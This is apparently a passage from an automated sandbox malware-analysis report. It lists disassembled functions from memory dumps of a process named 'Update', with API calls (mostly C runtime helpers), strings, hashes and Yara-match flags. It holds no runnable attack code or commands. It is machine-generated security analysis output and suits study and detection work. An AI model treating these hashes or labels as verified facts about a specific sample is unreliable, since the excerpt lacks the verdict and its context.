                                                                                            • API String ID: 1785806476-1799206989
                                                                                            • Opcode ID: 2ddc333418841b9c0091b11b10888a2bb55325350fdec26b8a8b1ec561b7ba84
                                                                                            • Instruction ID: c6cf99d56a38d59e0efd4c436779b1d38845bae8f69134aa5116d1cca0781333
                                                                                            • Opcode Fuzzy Hash: 2ddc333418841b9c0091b11b10888a2bb55325350fdec26b8a8b1ec561b7ba84
                                                                                            • Instruction Fuzzy Hash: 9E018F327003018FD765CA6CED9462AB3A69BC55027280E2ED0A1CF789D7B5DC424798
                                                                                            Function 034ED1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034ED1D4
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            • _memmove.LIBCMT ref: 034ED20D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: vector<T> too long
                                                                                            • API String ID: 1785806476-3788999226
                                                                                            • Opcode ID: 67781ebbd527d3778379e04bbf6d574d6898bde765d6e2cf0d43d02bd9953042
                                                                                            • Instruction ID: 1f31096de1d3540f6bab67d71cc44d83b5d8f6a3405fff93e2552c59349eea7e
                                                                                            • Opcode Fuzzy Hash: 67781ebbd527d3778379e04bbf6d574d6898bde765d6e2cf0d43d02bd9953042
                                                                                            • Instruction Fuzzy Hash: 6D01DD769006135FC710EFADE881C3E7B98E741252349037FDE11C7718D775A91A9754
                                                                                            Function 034E8430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E8443
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            • _memmove.LIBCMT ref: 034E846E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: vector<T> too long
                                                                                            • API String ID: 1785806476-3788999226
                                                                                            • Opcode ID: 0e7e7784445a183172f4489216a3f454b77f05fb097c06c81bf7871b4e3cc1c5
                                                                                            • Instruction ID: 3c191ddcea6195292e4836599f59fb0c8776292c486dc97ea84cb44671666bbd
                                                                                            • Opcode Fuzzy Hash: 0e7e7784445a183172f4489216a3f454b77f05fb097c06c81bf7871b4e3cc1c5
                                                                                            • Instruction Fuzzy Hash: 2D01A2B26003099FDB24DFA9DC9193BB3E8EB54616318492EE496CB340E630F840CB64
                                                                                            Function 00923414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFrame@12Setting__getptd
                                                                                            • String ID: j
                                                                                            • API String ID: 3454690891-2137352139
                                                                                            • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                            • Instruction ID: 18f9f0e6d090931ded57ad948dea8415f10ae16f2c647bf28b6bb61ac168674b
                                                                                            • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                            • Instruction Fuzzy Hash: 2111AD71D00268DBCB12EF58D4853ACBB70BF01314F24C1C9E4592B6A3C378AE91CB91
                                                                                            Function 009237A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 009237AF
                                                                                              • Part of subcall function 009198E6: __getptd_noexit.LIBCMT ref: 009198E9
                                                                                              • Part of subcall function 009198E6: __amsg_exit.LIBCMT ref: 009198F6
                                                                                            • __getptd.LIBCMT ref: 009237BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                            • Instruction ID: 4f97e6effbdf0bee96d48cb2deb6d38f8ca1afa896260c00754fcaed5623d372
                                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                            • Instruction Fuzzy Hash: AE014674800225CACF38AF21E544AACB3F9AF54311F64C86EF4949A695DB388B81DB61
                                                                                            Function 035006D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0350010A: __getptd.LIBCMT ref: 03500110
                                                                                              • Part of subcall function 0350010A: __getptd.LIBCMT ref: 03500120
                                                                                            • __getptd.LIBCMT ref: 035006E3
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 035006F1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction ID: 62f56c5b54402e7518d6c271d6bdd4a1a8f12e1365434bc4bda0be2fee1c66d9
                                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction Fuzzy Hash: 380174388003028ECF74DF21E4847AEB3B9BF00210F68486ED8899B2E0CB3A8580CE41
                                                                                            Function 03060093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 030600A2
                                                                                              • Part of subcall function 0305381A: __getptd_noexit.LIBCMT ref: 0305381D
                                                                                              • Part of subcall function 0305381A: __amsg_exit.LIBCMT ref: 0305382A
                                                                                            • __getptd.LIBCMT ref: 030600B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction ID: 5563dcf46cfff720aada6736313df8370cb5f2740e12cc22e9e0b620587df681
                                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction Fuzzy Hash: 5A01623884A306DBCFB4DF68C4406ADB7F9AF40211F58845EE4C29E554DF7495D1CB01
                                                                                            Function 6C38AA90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AcquireSRWLockExclusive.KERNEL32(6C3BC354,?,G.7l,?,6C37233F,6C3BC244,ios_base::badbit set,?,6C372E47,?,00000001), ref: 6C38AA9B
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6C3BC354,?,6C37233F,6C3BC244,ios_base::badbit set,?,6C372E47,?,00000001,?,?,?,?,?,?,?), ref: 6C38AAD5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                            • String ID: G.7l
                                                                                            • API String ID: 17069307-3243727157
                                                                                            • Opcode ID: 990635face0d2ce2147501b76bdfafa7711a718aefb697d3a374dacb10d96215
                                                                                            • Instruction ID: abe3265b370652b19c930b3fed04307b5a44a266f2eedb076aea6e16febc118b
                                                                                            • Opcode Fuzzy Hash: 990635face0d2ce2147501b76bdfafa7711a718aefb697d3a374dacb10d96215
                                                                                            • Instruction Fuzzy Hash: A8F08C35202245CFCB219F18C544A68B7B8FF87B38F24022AE9A547EC0D73D2842CE61